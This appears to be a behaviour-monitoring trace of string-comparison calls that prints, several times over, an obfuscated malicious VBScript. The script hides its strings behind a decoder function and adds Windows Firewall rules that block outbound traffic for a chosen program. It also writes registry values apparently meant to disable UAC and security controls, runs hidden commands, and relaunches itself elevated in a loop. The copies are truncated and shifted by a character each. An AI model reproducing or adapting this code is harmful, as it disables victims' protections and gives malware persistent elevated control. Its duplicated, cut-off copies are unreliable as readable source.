bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0222.980] wcsncmp (_String1="CK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0222.981] wcsncmp (_String1="K = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 62 [0222.981] wcsncmp (_String1=" = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.981] wcsncmp (_String1="= 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.981] wcsncmp (_String1=" 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, 